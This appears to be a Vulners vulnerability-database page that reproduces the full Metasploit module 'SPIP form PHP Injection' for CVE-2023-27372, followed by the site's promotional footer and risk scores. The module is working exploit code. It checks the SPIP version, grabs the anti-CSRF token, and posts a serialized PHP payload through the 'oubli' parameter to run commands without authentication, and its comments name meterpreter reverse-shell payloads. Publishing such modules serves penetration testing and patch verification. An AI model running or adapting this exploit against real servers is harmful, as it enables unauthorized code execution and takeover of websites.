Vulners
Lucene search
SPIP form PHP Injection
🗓️ 11 Sep 2024 18:54:41Reported by coiffeur, Laluka, Julien Voisin, Valentin LobsteinType 
metasploit🔗 www.rapid7.com👁 14773 Views
| Reporter | Title | Published | Views | Family All 58 |
|---|---|---|---|---|
 | SPIP Remote Command Execution Exploit | 18 Apr 202300:00 | – | zdt |
| SPIP v4.2.0 - Remote Code Execution (Unauthenticated) Exploit | 26 Jun 202300:00 | – | zdt |
 | Exploit for Deserialization of Untrusted Data in Spip | 11 Jul 202310:00 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 5 Jul 202314:41 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 28 Apr 202513:48 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 1 Jul 202317:08 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 7 Sep 202316:17 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 7 Mar 202600:14 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 31 Jul 202320:32 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Spip | 25 Jun 202319:30 | – | githubexploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HTTP::Spip
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SPIP form PHP Injection',
'Description' => %q{
This module exploits a PHP code injection in SPIP. The vulnerability exists in the
oubli parameter and allows an unauthenticated user to execute arbitrary commands
with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions
are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
},
'Author' => [
'coiffeur', # Initial discovery
'Laluka', # PoC
'Julien Voisin', # MSF module
'Valentin Lobstein' # Added Windows compatibility and code rewrite
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html' ],
[ 'URL', 'https://therealcoiffeur.com/c11010' ],
[ 'CVE', '2023-27372' ],
],
'Privileged' => false,
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
},
'DefaultTarget' => 0,
'DisclosureDate' => '2023-02-27'
)
)
end
def check
rversion = spip_version || spip_plugin_version('spip')
return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
print_status("SPIP Version detected: #{rversion}")
vulnerable_ranges = [
{ start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.1') },
{ start: Rex::Version.new('4.1.0'), end: Rex::Version.new('4.1.18') },
{ start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.0.10') },
{ start: Rex::Version.new('3.2.0'), end: Rex::Version.new('3.2.18') }
]
vulnerable_ranges.each do |range|
if rversion.between?(range[:start], range[:end])
return Exploit::CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
end
end
return Exploit::CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
end
def send_payload(cmd, args = {})
send_request_cgi(
{
'uri' => args['uri'],
'method' => 'POST',
'vars_post' => {
'page' => 'spip_pass',
'lang' => 'fr',
'formulaire_action' => 'oubli',
'formulaire_action_args' => args['csrf'],
'oubli' => cmd
}
}
)
end
def exploit
uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')
res = send_request_cgi({ 'uri' => uri })
fail_with(Msf::Exploit::Failure::Unreachable, "The request to uri: #{uri} did not respond") unless res
fail_with(Msf::Exploit::Failure::UnexpectedReply, "Got an http code that isn't 200: #{res.code}, when sending a request to uri: #{uri}") unless res&.code == 200
csrf = ''
unless (node = res.get_html_document.xpath('//form//input[@name="formulaire_action_args"]')).empty?
csrf = node.first['value']
end
print_status("Got anti-csrf token: #{csrf}")
print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to exploit...")
phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
final_payload = "<?php #{phped_payload} ?>"
oubli = "s:#{final_payload.length}:\"#{final_payload}\";"
send_payload(oubli, { 'uri' => uri, 'csrf' => csrf })
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2026 19:03Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.9312
SSVC